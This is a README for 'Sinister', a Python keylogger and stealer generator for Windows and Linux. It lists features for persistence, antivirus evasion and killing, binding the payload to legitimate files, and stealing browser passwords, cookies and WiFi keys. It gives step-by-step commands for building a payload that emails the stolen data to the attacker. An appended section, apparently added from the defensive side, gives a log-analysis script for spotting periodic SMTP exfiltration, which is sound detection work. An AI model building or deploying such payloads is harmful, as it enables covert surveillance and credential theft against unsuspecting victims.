Sinister
Sinister is a Windows/Linux keylogger generator that sends key-logs via email along with other juicy target info
This small python script can do really awesome work.
Sinister is a keylogger generator for Windows/Linux, written in Python 3, which sends key-logs and screenshots via email along with other juicy target info.
Disclaimer
<p align="center"> :computer: This project was created only for good purposes and personal use. </p>

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Features
- [x] Works on Windows/Linux
- [x] Notify New Victim Via Email
- [x] Undetectable
- [x] Persistence
- [x] Email Credentials Validation before Payload Generation.
- [x] Can receive Keylogs in any email provider such as GMAIL, YAHOO, OUTLOOK, Custom SMTP.
- SMTP Server/ Port

| Server Name | SMTP Server | SMTP Port |
| ----------- | ----------- | --------- |
| GMAIL | smtp.gmail.com | 587 |
| OUTLOOK | smtp-mail.outlook.com | 587 |
| YAHOO | smtp.mail.yahoo.com | 587 |

- [x] Sends Screenshot of Victim PC's Screen via email
- [x] Creates Executable Binary With Zero Dependencies
- [x] Creates a small (~5 MB) payload with advanced functionality
- [x] Obfuscates the Payload before Generating it, hence Bypassing a few more antivirus products
- [x] Generated Payload is Encoded with base64, hence making it extremely difficult to reverse engineer the payload
- [x] Function that Kills Antivirus on the Victim PC and tries to disable the security
- [x] Awesome Colourful Interface to generate payload
- [x] On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
- [x] Distinguishes Log Data on the Basis of Active Window Name (Check Image for Better Understanding)
- [x] Able to add custom Icon to evil file
- [x] Built-in Binder which can bind Keylogger to Any File [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service.
- [x] Checks for Already Running Instance on System, If running instance found, then only legitimate file is executed [Multiple Instance Prohibiter to avoid Receiving Duplicate Email Logs].
- [x] Attacker can Create/Compile for Both Windows/Linux OS Using Linux System, But Can only Create/Compile Windows Executable using Windows Machine
- [x] Retrieves Saved Passwords from victim System and sends it to Attacker.

| Built-in Stealer Can Steal These Things : |
| ----------------------------------------------------------- |
| Chrome Browser (Saved Password) |
| WiFi (Saved Password) |
| Chrome Cookies (Login Data, Cookies, History) |
| Firefox Cookies (cookies.sqlite) |

Note: The Stealer is custom coded and does not rely on LaZagne
- [x] Grabs & Send Useful Information of Victim's Device

| These Things are Grabbed & Sent: |
| -----------------------------------|
| Operating System |
| Computer Name |
| User Name |
| Public IPv4 |

- [x] If your payload is unable to execute, then specify --debug to run exe on foreground with CMD
Important
On 30 May 2022, Google removed the less secure apps feature, so instead of the Gmail Password:
- Enable 2FA on your attacker gmail
- Create App Specific Password
- Use that app specific password, while creating payload.
- How to Create App Specific Password: Click Here
Tested On
Prerequisite
- [x] Python 3.X
- [x] Few External Modules
How To Use in Linux
```bash
# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Navigate to Sinister folder
$ cd Sinister

# Installing dependencies
$ bash installer_linux.sh

# *** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
# * Click on custom install
# * Select Path to : C:/Python37-32
# So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Making Payload/RAT
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path
```
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
How To Use in Windows
```bash
# Install dependencies
# Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Go into the repository
$ cd Sinister

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open Sinister.py in Text editor and Configure Line 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Getting Help Menu
$ python Sinister.py --help

# Making Payload/RAT
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path
```
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
How to Update
- Run updater.py to Update Automatically or Download the latest Zip from this GitHub repo
- Note: Git Must be Installed in order to use updater.py
Note:- Evil File will be saved inside dist/ folder, inside Sinister/ folder
Available Arguments
- Optional Arguments

| Short Hand | Full Hand | Description |
| ---------- | --------- | ----------- |
| -h | --help | show this help message and exit |
| -i INTERVAL | --interval INTERVAL | Time between reports in seconds. default=120 |
| -t TIME_PERSISTENT | --persistence TIME_PERSISTENT | Becoming Persistence After __ seconds. default=10 |
| -x SMTP_Server | --smtp | Custom SMTP Server . default="smtp.gmail.com" |
| -y SMTP_Port | --port | Custom SMTP Port . default=587 |
| -w | --windows | Generate a Windows executable. |
| -l | --linux | Generate a Linux executable. |
| -s | --steal-password | Steal Saved Password from Victim Machine [Supported OS : Windows] |
| -b file.txt | --bind LEGITIMATE_FILE_PATH.pdf | AutoBinder : Specify Path of Legitimate file. [Supported OS : Windows] |
| -d | --debug | Payload Will Run In Foreground with CMD Window, To get Appropriate Execution Error |

Note : Either -w/--windows or -l/--linux must be specified
- Required Arguments

| Short Hand | Full Hand | Description |
| ---------- | --------- | ----------- |
| | --icon ICON | Specify Icon Path, Icon of Evil File [Note : Must Be .ico] |
| -e EMAIL | --email EMAIL | Email address to send reports to. |
| -p PASSWORD | --password PASSWORD | Password for the email address given in the -e argument. |
| -o OUT | --out OUT | Output file name. |
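
Seen from the defending side, the defaults documented above (SMTP submission to the listed providers on port 587, one report every 120 seconds unless `-i` changes it) can be hunted for in flow or proxy logs. The following is an added example, not part of the Sinister project; the log format, host and process names, and the mail-client allowlist are constructed assumptions.

```python
from collections import defaultdict
from statistics import median

# Provider endpoints and port taken from the SMTP table on this page.
SMTP_ENDPOINTS = {"smtp.gmail.com", "smtp-mail.outlook.com", "smtp.mail.yahoo.com"}
SMTP_PORT = 587
# Assumption: the only processes expected to submit mail on this estate.
MAIL_CLIENTS = {"thunderbird.exe", "outlook.exe"}

# Constructed sample flow log: "epoch_seconds host process dest_host dest_port"
SAMPLE_FLOWS = """\
1700000000 ws-014 outlook.exe smtp-mail.outlook.com 587
1700000030 ws-022 invoice_viewer.exe smtp.gmail.com 587
1700000151 ws-022 invoice_viewer.exe smtp.gmail.com 587
1700000270 ws-022 invoice_viewer.exe smtp.gmail.com 587
1700000391 ws-022 invoice_viewer.exe smtp.gmail.com 587
1700000400 ws-031 chrome.exe www.example.org 443
1700000900 ws-040 backup_agent.exe smtp.mail.yahoo.com 587
"""

def parse_flows(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or not parts[0].isdigit() or not parts[4].isdigit():
            continue  # skip malformed records rather than crash on them
        yield int(parts[0]), parts[1], parts[2].lower(), parts[3].lower(), int(parts[4])

def find_smtp_senders(text, allowed=MAIL_CLIENTS, jitter=15, min_hits=3):
    """Return one finding per non-mail process that uses SMTP submission."""
    seen = defaultdict(list)
    for ts, host, proc, dest, port in parse_flows(text):
        if port == SMTP_PORT and dest in SMTP_ENDPOINTS and proc not in allowed:
            seen[(host, proc, dest)].append(ts)
    findings = []
    for (host, proc, dest), stamps in sorted(seen.items()):
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        period = median(gaps) if gaps else None
        # Periodic: enough hits and every gap within `jitter` of the median gap.
        periodic = (len(stamps) >= min_hits
                    and all(abs(g - period) <= jitter for g in gaps))
        findings.append({"host": host, "process": proc, "dest": dest,
                         "hits": len(stamps), "period_s": period,
                         "periodic": periodic})
    return findings

if __name__ == "__main__":
    for finding in find_smtp_senders(SAMPLE_FLOWS):
        print(finding)
```

The check keys on regular spacing rather than the literal value 120, because the reporting interval is configurable; a single hit from an unlisted process is still reported, with `periodic` set to false, for manual review.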
